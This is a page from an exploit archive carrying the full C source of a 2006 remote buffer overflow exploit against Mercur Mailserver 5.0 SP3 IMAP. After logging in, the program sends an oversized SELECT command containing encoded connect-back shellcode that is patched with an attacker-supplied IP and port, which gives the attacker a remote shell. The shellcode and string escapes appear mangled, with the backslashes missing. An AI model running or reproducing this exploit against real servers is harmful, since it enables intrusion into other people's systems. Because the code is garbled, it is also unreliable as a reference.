[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
# Published : 2006-03-19
# Author : pLL
# Previous Title : crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit
# Next Title : PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)
/*
* mercur.cpp
*
* Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
* Copyright (C) 2006 Javaphile Group
* http://www.javaphile.org
*
* Exploits code by : pll Ellison.Tang[at]gmail[dot]com
*
* Bug Reference:
* http://www.frsirt.com/bulletins/4332
*
*/
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout=150000;
if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
{
printf("[-]WSAStartup failed.n");
exit(-1);
}
if((he=gethostbyname(ip))==0)
{
printf("[-]Failed to resolve '%s'.", ip);
exit(-1);
}
host.sin_port=htons(port);
host.sin_family=AF_INET;
host.sin_addr=*((struct in_addr *)he->h_addr);
if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("[-]Failed creating socket.");
exit(-1);
}
if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
{
closesocket(s);
printf("[-]Failed connecting to host.n");
exit(-1);
}
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void PrintSc(unsigned char *sc, int len)
{
int i,j;
char *p;
char msg[6];
//printf("/* %d bytes */n", buffsize);
// Print general shellcode
for(i = 0; i < len; i++)
{
if((i%16)==0)
{
if(i!=0)
printf(""n"");
else
printf(""");
}
//printf("\x%.2X", sc[i]);
sprintf(msg, "\x%.2X", sc[i] & 0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf("";n");
}
void main(int argc,char* argv[])
{
struct OSTYPE
{
unsigned int ret;
char des[255];
};
OSTYPE os[] = {
{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
{0xDDDDDDDD, "Debug"},
{0, NULL}
};
unsigned char shellcode[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
"xe8xedxffxffxff"
/* 254 bytes shellcode, xor with 0xee */
"x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
"x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"
"x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"
"x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"
"x84xecx11xb8xfex7dx86"
"x91xeexeexef" //ip
"x86"
"xecxee"
"xeexdb" //port
"x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"
"xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"
"x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"
"xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11"
"xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0"
"x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b"
"xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05"
"x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65"
"xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11"
"x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37"
"xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97";
unsigned char FindSc[]=
"x8BxCCx80xE9x3Ex8BxF1x33xC0x40xC1xE0x0Ax04x80x8B"
"xF8x57x33xC9xB1x3ExF3xA4x5FxFFxE7x8BxC7x04x28x50"
"x33xC0x50x64x89x20xBAx41x47x4Fx55x33xFFx3Bx17x74"
"x03x47xEBxF9x83xC7x04x3Bx17x74x03x47xEBxEFx83xC7"
"x04x57xC3x8Bx54x24x0Cx33xC0xB4x10x33xDBxB3x9Cx01"
"x04x13x33xC0xC3"
"x90x90x90x90"
"xEBxA5";
if(argc < 5)
{
printf("Mercur IMAPD 5.0 SP3 Remote Exploitn");
printf("-------------------------------------------n");
printf("Usage:n");
printf(" %s <Victim> <Connect back IP> <Connect back Port> <OsType>n", argv[0]);
printf("nType could be:n");
int i=0;
while(os[i].ret)
{
printf(" [%d] %sn", i, os[i].des);
i++;
}
return;
}
SOCKET s=ConnectTo(argv[1],143);
printf("[+]Connected to target...");
char szRecvBuff[600] = {0};
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!n");
return;
}
else
{
printf("done!n");
}
// printf("%sn",szRecvBuff);
if(strstr(szRecvBuff, "MERCUR") == NULL)
{
printf("[-]Seems not IMAP running.n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems IMAP running.n");
}
unsigned long dwCbIp=inet_addr(argv[2]);
unsigned short q=(unsigned short)atoi(argv[3]);
unsigned short dwCbPort=(unsigned short)q;
dwCbIp=dwCbIp^0xEEEEEEEE;
dwCbPort=dwCbPort^0xEEEE;
shellcode[92] =(char) (dwCbIp & 0x000000FF);
shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
shellcode[100] =(char) (dwCbPort & 0x000000FF);
char szUserName[20]={0};
printf("[?]Username:");
gets(szUserName);
char szPassWord[20]={0};
printf("[?]Passwd:");
gets(szPassWord);
char szLogin[]=" login ";
char szLoginInfo[50]={0};
unsigned char szSpace=0x20;
char szEnd[]="rn";
memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
int dwLen=lstrlen(szUserName);
memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
dwLen+=lstrlen(szLogin);
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,&szSpace,1);
dwLen++;
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
// printf("%sn",szLoginInfo);
printf("[+]Sending Login Info...");
send(s,szLoginInfo,lstrlen(szLoginInfo),0);
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!n");
return;
}
else
{
printf("done!n");
}
// printf("%sn",szRecvBuff);
if(strstr(szRecvBuff, "OK") == NULL)
{
printf("[-]Seems not a valid user or not support IMAP.n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems a valid user.n");
}
char szSelect[]=" select ";
char szMagicData[1000]={0};
memset(szMagicData,'A',sizeof(szMagicData)-1);
memcpy(szMagicData,szUserName,lstrlen(szUserName));
memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
int p=atoi(argv[4]);
*(unsigned int *)&FindSc[85] = os[p].ret;
memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
char szAdog[]="AGOU";
memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
printf("[+]Sending Magic Data To server...Good Luck!n");
send(s,szMagicData,sizeof szMagicData-1,0);
recv(s,szRecvBuff,sizeof(szRecvBuff),0);
printf("%sn",szRecvBuff);
Disconnect(s);
printf("[?]Sending finished...Good luck!n");
}
// www.Syue.com [2006-03-19]